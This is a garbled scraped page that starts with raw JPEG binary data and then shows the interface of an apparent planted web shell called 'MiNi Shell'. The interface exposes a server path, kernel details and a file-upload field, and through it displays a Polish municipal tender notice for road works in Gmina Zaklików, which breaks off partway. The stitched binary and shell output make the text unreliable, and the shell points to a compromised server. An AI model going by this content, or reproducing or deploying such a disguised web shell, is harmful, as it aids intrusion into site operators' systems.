JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240708/0040137601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa i przebudowa dróg na terenie Gminy Zaklików w miejscowościach Zaklików, Lipa, Łysaków Kolonia </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Zaklików</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 830409130</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Zachodnia 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zaklików</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-470</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL824 - Tarnobrzeski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@zaklikow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zaklikow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa i przebudowa dróg na terenie Gminy Zaklików w miejscowościach Zaklików, Lipa, Łysaków Kolonia </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-89833ec4-8829-407d-ab94-3b09c760a843</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00401376</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00041700/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Przebudowa i modernizacja drogi gminnej Nr 101410R Gielnia – Łysaków w m. Gielnia</p> <p class="mb-0">1.1.6 Przebudowa drogi ul. Dworcowej II w Zaklikowie</p> <p class="mb-0">1.1.7 Przebudowa drogi ul. Dworcowej w Lipie</p> <p class="mb-0">1.1.8 Przebudowa drogi wewnętrznej w miejscowości Łysaków Kolonia na dz. nr ewid. 35, 48, 110, 50 i 199 ( PŁ)</p> <p class="mb-0">1.1.49 Budowa drogi publicznej gminnej – połączenie ul. Krzywej z ul. Sandomierską w Zaklikowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zaklikow.ezamawiajacy.pl/pn/zaklikow/demand/notice/publicpzp/current/list?USER_MENU_HOVER=publicpzpCurrentNoticePublicList <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym, a Wykonawcami odbywa się przy użyciu Platformy<br/>zakupowej: https://zaklikow.ezamawiajacy.pl<br/>Zgłoszenie do postępowania w celu uzyskania dostępu do pełnych usług Platformy wymaga zalogowania Wykonawcy<br/>do Systemu na subdomenie https://zaklikow.ezamawiajacy.pllub https://oneplace.marketplanet.pl.<br/>Rejestracja Wykonawcy następuje automatycznie poprzez:<br/>- podpisanie się pod wnioskiem podpisem elektronicznym lub<br/>- kontakt z numerem telefonu podanym w potwierdzeniu.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do Zamawiającego, uważa się za dokumenty złożone w terminie, jeśli ich czytelna treść dotrze do Zamawiającego przed upływem tego terminu. Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przekazywanych w formie elektronicznej przyjmuje się datę ich rejestracji na Platformie.<br/>Dokumentacja prowadzonego postępowania zamieszczona na Platformie jest ogólnodostępna - każdy z Wykonawców może<br/>zapoznać się i pobrać udostępnione dokumenty oraz zadać pytanie w postępowaniu bez konieczności założenia konta na Platformie.<br/>Zamawiający określa niezbędne wymagania sprzętowo-aplikacyjne umożliwiające prawidłowe złożenie kwalifikowanego podpisu<br/>elektronicznego:<br/> zainstalowaną bezpłatną wersję oprogramowania Oracle JAVA w wersji co najmniej 1.8.0_202 lub użycie JAVA w wersji<br/>oprogramowania OpenJDK wydanej na licencji GPL.<br/> podłączony lub wbudowany do komputera czytnik karty kryptograficznej wydanej przez wystawcę certyfikatu używanego przez Wykonawcę;<br/> certyfikat kwalifikowany zainstalowany na komputerze, na którym Wykonawca będzie się logował do konta.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający informuje, że: <br/>1)	Jest administratorem danych osobowych Wykonawcy oraz osób, których dane Wykonawca przekazał w niniejszym postępowaniu;<br/>2)	dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. cRODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego <br/>na zadanie pn.: „Budowa i przebudowa dróg na terenie Gminy Zaklików w miejscowościach Zaklików, Lipa, Łysaków Kolonia” prowadzonym w trybie podstawowym;<br/>3)	odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz. U. z 2023 r. poz. 1605 ze zm.), dalej „ustawa Pzp”; <br/>4)	dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, w sposób gwarantujący jego nienaruszalność.<br/>5)	obowiązek podania przez Wykonawcę danych osobowych bezpośrednio go dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>6)	w odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO;<br/>7)	Wykonawca posiada:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy;<br/>−	na podstawie art. 16 RODO prawo do sprostowania danych osobowych, o ile ich zmiana nie skutkuje zmianą wyniku postępowania o udzielenie zamówienia <br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie narusza integralności protokołu oraz jego załączników;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna, że przetwarzanie jego danych osobowych narusza przepisy RODO;<br/>8)	Wykonawcy nie przysługuje:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IN.271.14.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1 zamówienia– „Budowa i przebudowa dróg w miejscowości Zaklików” i składa się z następujących zadań: <br/>Zadanie nr 1: Budowa drogi gminnej połączenie ul. Krzywej z ul. Sandomierską w Zaklikowie<br/>Zadanie obejmuje budowę drogi gminnej w zakresie: <br/>1. Roboty przygotowawcze i rozbiórkowe : odtworzenie trasy i punktów wysokościowych przy liniowych robotach ziemnych w terenie, zabezpieczenie linii kablowych rurami osłonowymi dwudzielnymi, likwidacja kolizji budowa studni telekomunikacyjnej , usunięcie warstwy ziemi urodzajnej (do późniejszego wykorzystania)<br/>2. Odwodnienie korpusu drogowego: dren dł. 85 m, kanały z rur strukturalnych z robotami towarzyszącymi, wykonanie wpustów ulicznych, wykonanie studni rewizyjnych, ułożenie ścieków z prefabrykowanych elementów betonowych, regulacja pionowa studni i zaworów<br/>3. Podbudowa jezdni: mechaniczne wykonanie koryta na całej szerokości jezdni wraz z profilowaniem i zagęszczeniem podłoża pod warstwy konstrukcyjne nawierzchni, podbudowa z gruntu stabilizowanego cementem, podbudowa z kruszywa łamanego<br/>4. Nawierzchnie i elementy ulic: Wykonanie warstwy wiążącej z mieszanki mineralno – asfaltowej, wykonanie nawierzchni z betonu asfaltowego, wykonanie nawierzchni z kruszywa łamanego (zjazdy)<br/>5. Oznakowanie dróg i urządzenia bezpieczeństwa ruchu: ustawienie słupków z rur stalowych dla znaków drogowych, przymocowanie tarcz znaków z blachy ocynkowanej – folia odblaskowa II generacji, oznakowanie poziome jezdni materiałami cienkowarstwowymi. <br/>6. Wykonanie umocnienia pobocza z kruszywa łamanego, inwentaryzacja powykonawcza<br/>4.2.1.2 Zadanie nr 2: Przebudowa drogi ul. Dworcowa II w Zaklikowie. Zadanie obejmuje przebudowę drogi w zakresie branży drogowej oraz oświetlenia ulicznego w szczególności:<br/>	I: Przebudowa drogi: <br/>	1. Roboty przygotowawcze i rozbiórkowe: odtworzenie trasy i punktów wysokościowych przy liniowych robotach ziemnych w terenie, zabezpieczenie linii kablowych rurami osłonowymi dwudzielnymi, karczowanie pni drzew, krzaków i poszycia wraz z wywiezieniem pozostałości, zdjęcie humusu<br/>	2. Odwodnienie korpusu drogowego: wykonanie części przelotowej przepustów drogowych rurowych jednootworowych na ławie z kruszywa łamanego, kanały z rur strukturalnych SN8 – DN200, wykonanie wpustów ulicznych fi 500, murki prefabrykowane, wykonanie studni rewizyjnych, ułożenie ścieków z prefabrykowanych elementów betonowych – korytka ściekowe, regulacja pionowa zaworów wodociągowych lub gazowych <br/>	3. Podbudowa jezdni: mechaniczne wykonanie koryta na całej szerokości jezdni wraz z profilowaniem i zagęszczeniem podłoża pod warstwy konstrukcyjne nawierzchni, wykonanie podbudowy z kruszywa łamanego ( jezdnia, zjazdy, droga dla pieszych)<br/>	4. Nawierzchnie i elementy ulic: wykonanie warstwy wiążącej z mieszanki mineralno – asfaltowej grysowej, wykonanie nawierzchni z betonu asfaltowego, wykonanie nawierzchni z kostki brukowej betonowej ( ściek, utwardzone pobocza, droga dla pieszych), ustawienie krawężników betonowych wraz z wykonaniem ław z oporem ( krawężniki wyniesione i zatopione)<br/>	5. Oznakowanie dróg i urządzenia bezpieczeństwa ruchu: ustawienie słupków z rur stalowych dla znaków drogowych, przymocowanie tarcz znaków z blachy ocynkowanej – folia odblaskowa II generacji, oznakowanie poziome jezdni materiałami cienkowarstwowymi. <br/>	6. Wykonanie umocnienia pobocza z kruszywa łamanego, oczyszczenie rowów z namułu z profilowaniem dna i skarp wraz z transportem i utylizacją urobku, inwentaryzacja powykonawcza<br/>	II. Oświetlenie uliczne - Linia kablowa, wydzielona oświetlenia ulicznego<br/>	1. roboty przygotowawcze<br/>	- ręczne i mechaniczne kopanie rowów <br/>	- podsypki – warstwa piasku na dnie rowu kablowego<br/>	- ułożenie rur osłonowych <br/>	2. roboty instalacyjne i montażowe <br/>	- układanie kabli w rowach kablowych, pustakach lub kanałach zamkniętych<br/>	- wykopy pionowe pod fundamenty słupów<br/>	- układanie uziomów w rowach kablowych <br/>	- mechaniczne i ręczne zasypywanie rowów <br/>	- montaż skrzynek bezpiecznikowych we wnękach słupów<br/>	- montaż i stawianie słupów oświetleniowych<br/>	- montaż wysięgników rurowych i przywieszek z lin stalowych <br/>	- montaż opraw oświetlenia zewnętrznego<br/>	- montaż przewodów do opraw oświetleniowych<br/>	- podłączenie przewodów pod zaciski lub bolce <br/>	3. Roboty wykończeniowe i inne, badania i pomiary<br/>	- rozbiórka nawierzchni z kostki brukowej, nawierzchnie po robotach kablowych z kostki brukowej <br/>	- badania linii kablowej średniego napięcia, niskiego napięcia i sterowniczej<br/>	- badania i pomiary instalacji uziemiającej, piorunochronnej – instalacja odgromowa <br/>	- badania i pomiary instalacji skuteczności zerowania </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45100000-8 - Przygotowanie terenu pod budowę</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">34922100-7 - Oznakowanie drogowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zrównanie okresu gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu rękojmi na wykonane roboty budowlane oraz dostarczone i wbudowane materiały</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">33,00</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe kierownika budowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">2,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 zamówienia– „Przebudowa dróg gminnych i wewnętrznych w miejscowościach Lipa, Kolonia Łysaków, Kolonia Łysaków - Gielnia” i składa się z następujących zadań: <br/>Zadanie nr 1: Przebudowa drogi wewnętrznej w miejscowości Łysaków Kolonia – zadanie obejmuje przebudowę drogi wewnętrznej w miejscowości kol. Łysaków na dz. nr ewid. 35, 48, 110, 50, 199 w zakresie: <br/>	1. Roboty przygotowawcze i rozbiórkowe: Odtworzenie trasy i punktów wysokościowych przy liniowych robotach ziemnych, wycinka krzaków i poszycia wraz z wywiezieniem pozostałości, rozbiórka przepustów z rur betonowych, usunięcie warstwy ziemi urodzajnej ( humusu) <br/>	2. Elementy odwodnienia: ułożenie przepustów pod koroną drogi, montaż żelbetowego murka czołowego prostego, <br/>	3. Podbudowy: Mechaniczne wykonanie koryta na całej szerokości jezdni wraz z profilowaniem i zagęszczeniem podłoża pod warstwy konstrukcyjne nawierzchni, wykonanie podbudowy z kruszywa łamanego <br/>	4. Nawierzchnie i elementy ulic: wykonanie warstwy wiążącej z mieszanki mineralno – asfaltowej grysowej, wykonanie warstwy ścieralnej z mieszanki mineralno – asfaltowej, wykonanie umocnienia pobocza z kruszywa łamanego<br/>	5. oznakowanie i pozostałe roboty wykończeniowe i inne: ustawienie słupków z rur stalowych dla znaków drogowych, przymocowanie do gotowych słupków tarcz znaków i tabliczek, inwentaryzacja geodezyjna powykonawcza <br/>4.2.2.2 Zadanie nr 2: Przebudowa drogi gminnej nr 101410R Gielnia - Łysaków – zadanie obejmuje przebudowę drogi gminnej w ciągu Gielnia – Kol. Łysaków – Łysaków w zakresie: <br/>	1. Roboty przygotowawcze i rozbiórkowe: Odtworzenie trasy i punktów wysokościowych przy liniowych robotach ziemnych, wycinka krzaków i poszycia wraz z wywiezieniem pozostałości, frezowanie korekcyjne nawierzchni bitumicznej,<br/>	2. Podbudowy: wykonanie koryta wraz z profilowaniem i zagęszczeniem podłoża pod warstwy konstrukcyjne – poszerzenia jezdni, wykonanie i zagęszczenie warstwy piasku, wykonanie podbudowy z kruszywa łamanego (poszerzenia lokalne, mijanki), wykonanie podbudowy z betonu asfaltowego, przyklejenie geosiatki na całej powierzchni jezdni, wykonanie wyrównania istniejącej nawierzchni bitumicznej mieszanką mineralno – asfaltową<br/>	3. Nawierzchnie: wykonanie warstwy wiążącej z mieszanki mineralno – asfaltowej grysowej, wykonanie nawierzchni z betonu asfaltowego – warstwa ścieralna <br/>	4. Oznakowanie dróg i urządzenia bezpieczeństwa ruchu: ustawienie słupków z rur stalowych dla znaków drogowych, przymocowanie tarcz znaków z blachy ocynkowanej – folia odblaskowa II generacji, oznakowanie poziome jezdni materiałami cienkowarstwowymi. <br/>	5. Roboty wykończeniowe i inne: oczyszczenie rowów z namułu z profilowaniem dna i skarp rowów, mechaniczne wykonanie nasypów wraz z formowaniem i zagęszczeniem nasypu – uzupełnienie korony pod wykonanie poboczy, wykonanie umocnienia pobocza z kruszywa łamanego<br/>	6. Inwentaryzacja geodezyjna powykonawcza <br/>4.2.2.3 Zadanie nr 3: Przebudowa drogi ul. Dworcowa w m-ci Lipa – zadanie obejmuje pierwszy etap przebudowy drogi wewnętrznej ul. Dworcowej w m-ci Lipa w zakresie: <br/>	1. Roboty przygotowawcze i rozbiórkowe: Odtworzenie trasy i punktów wysokościowych przy liniowych robotach ziemnych, frezowanie istniejącej nawierzchni bitumicznej, rozbiórka istniejącej podbudowy z kruszywa łamanego, zabezpieczenie linii kablowych eN rurami osłonowymi, zabezpieczenie linii kablowych tp rurami osłonowymi dwudzielnymi, budowa linii kablowej tp wraz z przepięciem czynnej linii, wycinka drzew i karczowanie pni drzew wraz z wywiezieniem pozostałości, mechaniczne usunięcie ziemi urodzajnej (humusu) <br/>	2. Roboty ziemne: mechaniczne wykonanie nasypów wraz z formowaniem i zagęszczeniem nasypu <br/>	3. Podbudowy: Mechaniczne wykonanie koryta na całej szerokości jezdni z profilowaniem i zagęszczeniem podłoża pod warstwy konstrukcyjne, stabilizacji podłoża cementem, wykonanie podbudowy z kruszywa łamanego<br/>	4. Nawierzchnie i elementy ulic: wykonanie warstwy wiążącej z mieszanki mineralno – asfaltowej grysowej, wykonanie nawierzchni z betonu asfaltowego, wykonanie nawierzchni z kostki brukowej betonowej kolor. 8 cm na podsypce cementowo – piaskowej, ustawienie obrzeży betonowych <br/>	5. Roboty wykończeniowe i inne: wykonanie umocnienia pobocza z kruszywa łamanego, regulacja pionowa studni tp, zaworów wodociągowych lub gazowych w tym odkopanie wraz z wymianą skrzynek ulicznych na typ ciężki, inwentaryzacja geodezyjna powykonawcza. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45100000-8 - Przygotowanie terenu pod budowę</span></h3> 